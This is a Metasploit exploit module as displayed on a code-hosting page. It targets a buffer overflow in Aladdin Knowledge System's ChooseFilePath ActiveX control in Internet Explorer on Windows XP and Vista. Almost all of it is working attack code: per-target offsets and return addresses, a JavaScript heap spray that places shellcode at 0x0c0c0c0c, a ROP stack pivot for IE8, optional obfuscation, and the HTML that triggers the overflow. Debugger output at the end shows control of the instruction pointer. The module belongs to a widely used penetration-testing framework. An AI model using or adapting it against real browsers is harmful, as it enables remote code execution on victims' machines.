Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = NormalRanking
8
9
include Msf::Exploit::Remote::BrowserExploitServer
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => "Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflow",
16
'Description' => %q{
17
This module exploits a vulnerability found in Aladdin Knowledge System's
18
ActiveX component. By supplying a long string of data to the ChooseFilePath()
19
function, a buffer overflow occurs, which may result in remote code execution
20
under the context of the user.
21
},
22
'License' => MSF_LICENSE,
23
'Author' => [
24
'shinnai', # Vulnerability Discovery
25
'b33f', # Original exploit
26
'sinn3r', # Metasploit
27
'juan vazquez' # Metasploit, IE8 target
28
],
29
'References' => [
30
[ 'OSVDB', '86723' ],
31
[ 'EDB', '22258' ],
32
[ 'EDB', '22301' ]
33
],
34
'Payload' => {
35
'StackAdjustment' => -3500
36
},
37
'DefaultOptions' => {
38
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
39
},
40
'Platform' => 'win',
41
'BrowserRequirements' => {
42
:source => /script|headers/i,
43
:activex => [
44
{
45
clsid: "{09F68A41-2FBE-11D3-8C9D-0008C7D901B6}",
46
method: "ChooseFilePath"
47
}
48
],
49
:os_name => OperatingSystems::Match::WINDOWS,
50
},
51
'Targets' => [
52
[ 'Automatic', {} ],
53
[
54
'Windows XP with IE 6',
55
{
56
'os_name' => OperatingSystems::Match::WINDOWS_XP,
57
'ua_name' => 'MSIE',
58
'ua_ver' => '6.0',
59
'Rop' => false,
60
'Offset' => '0x5F4',
61
'Ret' => 0x0c0c0c0c
62
}
63
],
64
[
65
'Windows XP with IE 7',
66
{
67
'os_name' => OperatingSystems::Match::WINDOWS_XP,
68
'ua_name' => 'MSIE',
69
'ua_ver' => '7.0',
70
'Rop' => false,
71
'Offset' => '0x5F4',
72
'Ret' => 0x0c0c0c0c
73
}
74
],
75
[
76
'Windows XP with IE 8',
77
{
78
'os_name' => OperatingSystems::Match::WINDOWS_XP,
79
'ua_name' => 'MSIE',
80
'ua_ver' => '8.0',
81
'Rop' => true,
82
'Offset' => '0x5f6',
83
'Ret' => 0x77c2282e # stackpivot # mov esp,ebp # pop ebp # retn # msvcrt.dll
84
}
85
],
86
[
87
'Windows Vista with IE 7',
88
{
89
'os_name' => OperatingSystems::Match::WINDOWS_VISTA,
90
'ua_name' => 'MSIE',
91
'ua_ver' => '7.0',
92
'Rop' => false,
93
'Offset' => '0x5F4',
94
'Ret' => 0x0c0c0c0c
95
}
96
]
97
98
],
99
'Privileged' => false,
100
'DisclosureDate' => '2012-04-01',
101
'DefaultTarget' => 0,
102
'Notes' => {
103
'Reliability' => UNKNOWN_RELIABILITY,
104
'Stability' => UNKNOWN_STABILITY,
105
'SideEffects' => UNKNOWN_SIDE_EFFECTS
106
}
107
)
108
)
109
110
register_options(
111
[
112
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
113
], self.class
114
)
115
end
116
117
def ie_heap_spray(p)
118
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(get_target.arch))
119
js_nops = Rex::Text.to_unescape("\x0c" * 4, Rex::Arch.endian(get_target.arch))
120
randnop = rand_text_alpha(rand(100) + 1)
121
122
# Land the payload at 0x0c0c0c0c
123
124
js = %Q|
125
var heap_obj = new heapLib.ie(0x20000);
126
var code = unescape("#{js_code}");
127
var #{randnop} = "#{js_nops}";
128
var nops = unescape(#{randnop});
129
while (nops.length < 0x80000) nops += nops;
130
var offset = nops.substring(0, #{get_target['Offset']});
131
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
132
while (shellcode.length < 0x40000) shellcode += shellcode;
133
var block = shellcode.substring(0, (0x80000-6)/2);
134
heap_obj.gc();
135
for (var i=1; i < 0x300; i++) {
136
heap_obj.alloc(block);
137
}
138
|
139
140
js = heaplib(js, { :noobfu => true })
141
142
if datastore['OBFUSCATE']
143
js = ::Rex::Exploitation::JSObfu.new(js)
144
js.obfuscate(memory_sensitive: true)
145
end
146
147
return js
148
end
149
150
def exploit_template(cli, target_info)
151
if get_target['Rop']
152
p = generate_rop_payload('msvcrt', get_payload(cli, target_info), { 'target' => 'xp' })
153
else
154
p = get_payload(cli, target_info)
155
end
156
157
spray = ie_heap_spray(p)
158
target_ret = Rex::Text.to_hex([get_target.ret].pack("V"))
159
160
html_template = %Q|
161
<html>
162
<object id="pwnd" classid="clsid:09F68A41-2FBE-11D3-8C9D-0008C7D901B6"></object>
163
<script>
164
<%=spray%>
165
junk='';
166
for( counter=0; counter<=267; counter++) junk+=unescape("%0c");
167
pwnd.ChooseFilePath(junk + "<%=target_ret%>");
168
</script>
169
</html>
170
|
171
172
return html_template, binding()
173
end
174
175
def on_request_exploit(cli, request, target_info)
176
print_status("Sending HTML...")
177
send_exploit_html(cli, exploit_template(cli, target_info))
178
end
179
end
180
181
=begin
182
0:008> g
183
(82c.12dc): Access violation - code c0000005 (first chance)
184
First chance exceptions are reported before any exception handling.
185
This exception may be expected and handled.
186
eax=0c0c0c0c ebx=00001d56 ecx=020b93d4 edx=00001d56 esi=00001d60 edi=020b93e8
187
eip=7712a41a esp=020b93bc ebp=020b93c4 iopl=0 nv up ei pl zr na pe nc
188
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
189
OLEAUT32!SysReAllocStringLen+0x31:
190
7712a41a 8b00 mov eax,dword ptr [eax] ds:0023:0c0c0c0c=????????
191
0:008> g
192
(82c.12dc): Access violation - code c0000005 (first chance)
193
First chance exceptions are reported before any exception handling.
194
This exception may be expected and handled.
195
eax=00000000 ebx=00000000 ecx=0c0c0c0c edx=7c9032bc esi=00000000 edi=00000000
196
eip=0c0c0c0c esp=020b8fec ebp=020b900c iopl=0 nv up ei pl zr na pe nc
197
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
198
0c0c0c0c ?? ???
199
0:008> db 020bf798
200
020bf798 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................
201
020bf7a8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................
202
020bf7b8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................
203
020bf7c8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................
204
020bf7d8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................
205
020bf7e8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................
206
020bf7f8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................
207
020bf808 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................
208
=end
209
210